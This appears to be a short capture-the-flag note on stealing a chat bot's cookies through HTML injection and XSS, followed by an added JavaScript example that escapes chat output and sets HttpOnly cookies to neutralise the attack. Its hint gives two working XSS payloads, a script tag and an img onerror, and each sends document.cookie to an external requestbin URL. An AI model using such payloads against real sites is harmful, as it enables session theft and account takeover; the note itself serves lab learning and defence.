onlyhacks

[!bug] HTML injection | XSS

  • After registration, check for HTML injection.
  • Need to get the cookies from the chat bot via XSS.
  • For intercepting the request:

[!hint] Payload using script tag: `<script>document.location="https://requestbin.whapi.cloud/id?c="+document.cookie</script>` or img tag: `<img src="x" onerror="fetch('https://requestbin.whapi.cloud/id?cookie='+document.cookie)"/>` (not tested)
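
The fix side of this finding, as an added example that is not part of the original note or the challenge's code: output-encoding chat messages so both payloads above render as inert text, and marking the session cookie `HttpOnly` so `document.cookie` cannot read it. The function names, the `session` cookie name and the sample value are assumptions.

```javascript
// Added example (not from the original note): server-side handling that makes
// the note's two payloads inert. Function and cookie names are hypothetical.

// The two payloads quoted in the note, used here only as test input.
const NOTE_PAYLOADS = [
  `<script>document.location="https://requestbin.whapi.cloud/id?c="+document.cookie</script>`,
  `<img src="x" onerror="fetch('https://requestbin.whapi.cloud/id?cookie='+document.cookie)"/>`,
];

const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Encode every character that can open a tag, close one, or break out of an attribute.
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Render one chat message. User-controlled values only ever land in element
// content, and only after encoding, so the bot's browser sees text, not markup.
function renderChatMessage(author, text) {
  return `<li class="msg"><b>${escapeHtml(author)}</b>: ${escapeHtml(text)}</li>`;
}

// Session cookie header. HttpOnly keeps the value out of document.cookie, so an
// injection that slips through elsewhere still cannot read the session.
function sessionCookieHeader(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; HttpOnly; Secure; SameSite=Strict`;
}

// Count the tags a browser would actually parse in a fragment.
function countTags(html) {
  return (html.match(/<[a-z\/]/gi) || []).length;
}

for (const payload of NOTE_PAYLOADS) {
  const html = renderChatMessage("guest", payload);
  // Only the template's own four tags (<li>, <b>, </b>, </li>) remain.
  console.log(countTags(html), html);
}
console.log("Set-Cookie: " + sessionCookieHeader("session", "constructed-value"));
```
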